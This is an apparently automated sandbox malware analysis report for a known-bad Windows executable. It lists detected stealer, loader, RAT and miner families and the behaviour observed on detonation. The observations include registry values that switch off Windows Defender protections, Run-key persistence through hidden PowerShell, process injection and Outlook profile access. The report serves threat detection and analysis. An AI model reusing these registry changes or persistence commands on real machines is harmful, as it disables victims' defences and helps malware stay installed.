Analysis Overview
SHA256
0c9c2b2e01cde2f57e44e47e1535d99c384299cf58246d3b54738437b862199e
Threat Level: Known bad
The file 0c9c2b2e01cde2f57e44e47e1535d99c384299cf58246d3b54738437b862199e was found to be: Known bad.
Malicious Activity Summary
Glupteba
Raccoon Stealer payload
ZGRat
Raccoon
RedLine payload
DcRat
Modifies Windows Defender Real-time Protection settings
SectopRAT
Detect ZGRat V1
Amadey
xmrig
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
SmokeLoader
SectopRAT payload
Glupteba payload
XMRig Miner payload
Stops running service(s)
Downloads MZ/PE file
Modifies Windows Firewall
Drops file in Drivers directory
Blocklisted process makes network request
Checks computer location settings
UPX packed file
Windows security modification
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook profiles
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Detected potential entity reuse from brand paypal.
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Program Files directory
Enumerates physical storage devices
Program crash
Unsigned PE
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
outlook_office_path
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Enumerates system info in registry
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
outlook_win_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-31 08:37
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-31 08:37
Reported
2023-10-31 08:40
Platform
win10v2004-20231020-en
Max time kernel
85s
Max time network
155s
Command Line
Signatures
Amadey
DcRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\35B5.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\35B5.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\35B5.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\35B5.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\35B5.exe | N/A |
Raccoon
Raccoon Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 7596 created 3340 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 7596 created 3340 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 7596 created 3340 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 7596 created 3340 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
ZGRat
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\71B7.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\A791.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\B51F.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3BD2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5sW5Ys6.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A1C3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A1C3.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9530.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\35B5.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\A791.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\A791.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\A791.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\A791.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\A791.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ar4Xn47.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\315C.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rL9DZ7tX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\7969.exe'\"" | C:\Users\Admin\AppData\Local\Temp\7969.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CR4mX3Yy.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\0c9c2b2e01cde2f57e44e47e1535d99c384299cf58246d3b54738437b862199e.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Iv3wi58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fI8YT47.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\eM7DD79.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\hE3IM58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xE7tl9fZ.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\qB1sm8br.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Detected potential entity reuse from brand paypal.
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4696 set thread context of 3920 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1nK16BK9.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1476 set thread context of 4288 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2lG0309.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 2364 set thread context of 2756 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4pd309gA.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 5156 set thread context of 3208 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1dh83Ih5.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 3876 set thread context of 456 | N/A | C:\Windows\SysWOW64\cacls.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
| PID 3296 set thread context of 8356 | N/A | C:\Users\Admin\AppData\Local\Temp\9530.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\LAudioConverter\is-LMBS8.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-NFMSV.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-CUO9J.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\XML\Styles\is-96P3R.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-7A9OI.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\XML\Styles\is-27EHL.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-8FHOU.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\LAudioConverter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-H7Q29.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-OHIRP.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-RC85V.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\XML\Styles\is-65VMU.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-KLO7Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-GD55H.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-KOLU3.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-DH1JJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-FBOH4.tmp\LzmwAqmV.tmp | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Qw72en.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Qw72en.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Qw72en.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
